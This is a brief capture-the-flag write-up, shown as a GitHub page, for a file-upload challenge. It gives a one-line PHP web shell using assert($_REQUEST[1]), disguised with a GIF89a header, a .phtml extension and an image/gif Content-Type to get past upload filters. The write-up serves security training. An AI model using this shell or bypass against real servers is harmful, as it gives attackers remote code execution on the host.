Skip to content

Latest commit

 

History

History
20 lines (12 loc) · 227 Bytes

[极客大挑战 2019]Upload.md

File metadata and controls

20 lines (12 loc) · 227 Bytes

[极客大挑战 2019]Upload

知识点

文件上传

phtml

解题

上传.phtml

并设置Content-Type: image/gif

GIF89a
<script language='php'>assert($_REQUEST[1]);</script>

正常连接即可